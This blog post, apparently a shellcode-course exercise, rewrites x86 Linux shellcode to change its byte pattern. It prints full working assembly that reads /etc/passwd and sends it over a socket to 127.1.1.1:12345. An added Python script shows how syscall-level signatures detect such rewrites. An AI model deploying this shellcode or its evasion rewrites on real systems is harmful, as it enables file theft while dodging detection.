
Saturday, March 12, 2016

6_3 - Polymorphism: reading "/etc/passwd" file on 127.1.1.1:12345


6_3 - READING "/ETC/PASSWD"

1 - INTRODUCTION

- The same concepts studied in 6_1 apply in this case.


2 - MODIFYING A SHELLCODE

- The original shellcode to be modified in this exercise reads the "/etc/passwd" file and sends its content to 127.1.1.1 port 12345:

http://shell-storm.org/shellcode/files/shellcode-861.php

- Let's see 4 possible modifications:


a) Instead of using "inc", adding 1:

    ; inc ebx
    add ebx, 0x1

b) When moving between two registers, going through a third intermediate register, which is useless and harmless but changes the byte pattern:

    ; mov esi, eax
    mov edx, eax
    mov esi, edx

c) Using "mov" instead of "push/pop":

    ; push 0x4
    ; pop eax
    mov eax, 0x4

d) Writing to the stack with "mov" instead of "push", then adjusting esp by hand:

    ; push DWORD 0x0101017f  ; 127.1.1.1
    ; push WORD 0x3930       ; Port 12345
    ; push WORD bx

    mov dword [esp-4], 0x0101017f ; <- mov instead of push
    mov word [esp-6], 0x3930
    mov word [esp-8], bx

    sub esp, 8

- The assembly program that results from applying these modifications is A6_3.nasm:


section .text

global _start

_start:
    ; socket
    push BYTE 0x66   
    pop eax
    xor ebx, ebx 
    ; inc ebx 
    add ebx,0x1 ; <-adding 1 to ebx
    xor edx, edx
    push edx 
    push BYTE 0x1
    push BYTE 0x2
    mov ecx, esp
    int 0x80
    ; mov esi, eax 
    mov edx, eax ; <- going around
    mov esi, edx

    ; connect
    push BYTE 0x66 
    pop eax
    ; inc ebx
    add ebx,0x1 ; <-adding 1 to ebx
    
    ;push DWORD 0x0101017f  ;127.1.1.1
    ;push WORD 0x3930  ; Port 12345
    ;push WORD bx
    
    mov dword [esp-4], 0x0101017f ; <- mov instead of push
    mov word [esp-6], 0x3930
    mov word [esp-8], bx
    sub esp,8

    mov ecx, esp
    push BYTE 16
    push ecx
    push esi
    mov ecx, esp
    ; inc ebx
    add ebx, 0x1 ; <-adding 1 to ebx
    int 0x80

    ; dup2
    mov esi, eax
    push BYTE 0x1
    pop ecx
    mov BYTE al, 0x3F
    int 0x80
    
    ;read the file
    jmp short call_shellcode
    
shellcode:
    push 0x5
    pop eax
    pop ebx
    xor ecx,ecx
    int 0x80
    mov ebx,eax
    mov al,0x3
    mov edi,esp
    mov ecx,edi
    xor edx,edx
    mov dh,0xff
    mov dl,0xff
    int 0x80
    mov edx,eax
    ; push 0x4
    ; pop eax
    mov eax, 0x4 ; <- mov instead of push/pop
    mov bl, 0x1
    int 0x80
    ; push 0x1
    ; pop eax
    mov eax, 0x1 ; <- mov instead of push/pop
    inc ebx
    int 0x80
   
call_shellcode:
    call shellcode
    message db "/etc/passwd"
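
As an added illustration from the detection side (example code written for this page, not part of the original post or of the shell-storm entry): modifications a) to c) keep the behaviour identical while changing the bytes. The script below hand-encodes two constructed fragments modelled on the program's write/exit tail, decodes the handful of x86 instruction forms involved, folds push/pop, mov, inc and add into one normalized form, and shows that a byte signature on the original "push 0x4 ; pop eax" misses the variant while a signature over the recovered syscall sequence matches both. The fragment bytes, the IR strings and the helper names are assumptions of the example.

```python
"""
Constructed example (not the page's shellcode): the same behaviour encoded
two ways, compared under a byte signature and a syscall-sequence signature.
Encodings are the standard 32-bit x86 forms; the fragments are assumptions
modelled on the write()/exit() tail of the program shown on the page.
"""

REG32 = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]
REG8 = ["al", "cl", "dl", "bl", "ah", "ch", "dh", "bh"]
LOW8 = {"al": "eax", "cl": "ecx", "dl": "edx", "bl": "ebx"}

# Constructed fragment, hand-encoded:
#   push 0x4 ; pop eax ; mov bl,1 ; int 0x80 ; push 0x1 ; pop eax ; inc ebx ; int 0x80
ORIGINAL = bytes.fromhex("6a04 58 b301 cd80 6a01 58 43 cd80")
# Same behaviour after modifications a) and c):
#   mov eax,4 ; mov bl,1 ; int 0x80 ; mov eax,1 ; add ebx,1 ; int 0x80
VARIANT = bytes.fromhex("b804000000 b301 cd80 b801000000 83c301 cd80")


def _imm(buf, n, signed=False):
    """Little-endian immediate of n bytes; refuse to read past the end."""
    if len(buf) < n:
        raise ValueError("truncated instruction")
    return int.from_bytes(buf[:n], "little", signed=signed)


def decode(code):
    """Linear-sweep decoder for only the forms the fragments use.
    Returns a list of (mnemonic, operands); unknown opcodes raise so that
    nothing is skipped silently."""
    out, i = [], 0
    while i < len(code):
        op, rest = code[i], code[i + 1:]
        if op == 0x6A:                                   # push imm8 (sign-extended)
            out.append(("push", (_imm(rest, 1, True),))); i += 2
        elif 0x58 <= op <= 0x5F:                         # pop r32
            out.append(("pop", (REG32[op - 0x58],))); i += 1
        elif 0xB8 <= op <= 0xBF:                         # mov r32, imm32
            out.append(("mov", (REG32[op - 0xB8], _imm(rest, 4)))); i += 5
        elif 0xB0 <= op <= 0xB7:                         # mov r8, imm8
            out.append(("mov", (REG8[op - 0xB0], _imm(rest, 1)))); i += 2
        elif 0x40 <= op <= 0x47:                         # inc r32
            out.append(("inc", (REG32[op - 0x40],))); i += 1
        elif op == 0x83 and rest and rest[0] >= 0xC0 and (rest[0] >> 3) & 7 == 0:
            out.append(("add", (REG32[rest[0] & 7], _imm(rest[1:], 1, True)))); i += 3
        elif op == 0x31 and rest and rest[0] >= 0xC0:    # xor r32, r32 (mod = 11)
            out.append(("xor", (REG32[rest[0] & 7], REG32[(rest[0] >> 3) & 7]))); i += 2
        elif op == 0xCD:                                 # int imm8
            out.append(("int", (_imm(rest, 1),))); i += 2
        else:
            raise ValueError(f"unsupported opcode {op:#04x} at offset {i}")
    return out


def normalize(insns):
    """Fold equivalent forms into one IR (push/pop == mov, inc == add 1,
    xor r,r == mov r,0) and model the register file so that every int 0x80
    is labelled with the syscall number held in eax."""
    ir, regs, k = [], {}, 0
    while k < len(insns):
        mn, ops = insns[k]
        nxt = insns[k + 1] if k + 1 < len(insns) else None
        if mn == "push" and nxt and nxt[0] == "pop":
            step, reg, val, k = "=", nxt[1][0], ops[0] & 0xFFFFFFFF, k + 2
        elif mn == "mov":
            step, (reg, val), k = "=", ops, k + 1
        elif mn == "inc":
            step, reg, val, k = "+=", ops[0], 1, k + 1
        elif mn == "add":
            step, (reg, val), k = "+=", ops, k + 1
        elif mn == "xor" and ops[0] == ops[1]:
            step, reg, val, k = "=", ops[0], 0, k + 1
        elif mn == "int" and ops[0] == 0x80:
            eax = regs.get("eax")
            ir.append(f"syscall({eax if eax is not None else '?'})")
            k += 1
            continue
        else:
            raise ValueError(f"no normalization rule for {mn} {ops}")
        ir.append(f"{reg} {step} {val}")
        if reg in LOW8:                       # byte write: keep upper bytes if known
            base = regs.get(LOW8[reg])
            regs[LOW8[reg]] = None if base is None else (base & 0xFFFFFF00) | (val & 0xFF)
        elif step == "=":
            regs[reg] = val & 0xFFFFFFFF
        else:
            base = regs.get(reg)
            regs[reg] = None if base is None else (base + val) & 0xFFFFFFFF
    return ir


def byte_signature_hits(code, pattern=bytes.fromhex("6a0458")):
    """Static byte pattern for 'push 0x4 ; pop eax' as found in the original."""
    return pattern in code


def behaviour_signature_hits(code, pattern=("syscall(4)", "syscall(1)")):
    """Ordered subsequence match on syscall numbers: write (4) then exit (1)."""
    calls = iter(x for x in normalize(decode(code)) if x.startswith("syscall("))
    return all(any(c == p for c in calls) for p in pattern)


if __name__ == "__main__":
    for name, code in (("original", ORIGINAL), ("variant", VARIANT)):
        print(f"{name:8} {code.hex():36} byte-sig={byte_signature_hits(code)} "
              f"behaviour-sig={behaviour_signature_hits(code)} nul-bytes={0 in code}")
        print("   ir:", "; ".join(normalize(decode(code))))
```

Both fragments normalize to the same IR, so the behaviour signature fires on both while the byte signature only fires on the original. One caveat the post does not mention, which the script also reports: "mov eax, 0x4" assembles to B8 04 00 00 00 and so brings NUL bytes into the payload that the push/pop pair avoided. From the defender's side the lesson of a) to d) together is that signatures on instruction bytes are brittle against this class of rewrite, whereas matching on the recovered syscall sequence (socket, connect, dup2, open, read, write) survives it.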

3 - TESTING POLYMORPHISM

- Assembling and linking A6_3.nasm:

- Extracting the shellcode:

- Pasting the shellcode into the ShellcodeTest.c program:

- Compiling ShellcodeTest.c:

- To test the program, the nc tool is started from a second console to listen on 127.1.1.1:12345:

- Executing ShellcodeTest, the result is the same as with the original program: the content of "/etc/passwd" is received at 127.1.1.1 port 12345:

- While the original shellcode had 111 bytes, the new one has 104 bytes, a reduction of 6.3%.